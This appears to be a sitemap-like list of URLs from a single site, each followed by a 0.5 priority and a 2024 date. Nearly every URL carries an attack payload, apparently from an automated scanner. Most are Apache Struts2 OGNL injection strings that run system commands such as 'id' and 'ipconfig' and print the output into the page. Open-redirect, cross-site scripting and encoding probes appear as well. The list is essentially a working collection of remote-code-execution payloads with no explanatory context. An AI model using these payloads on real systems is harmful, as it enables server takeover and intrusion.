http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm68647%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem61145?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?=%3c365839%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?=osm14482%c0%beo1%c0%bco2a%90bcoem15615 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?=xsstest341 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm14482%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem15615?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f=xsstest341? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f=%2578%2573%2573%2574%2565%2573%2574%2535%2533%2532? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?=xsstest505 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f=xsstest505? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 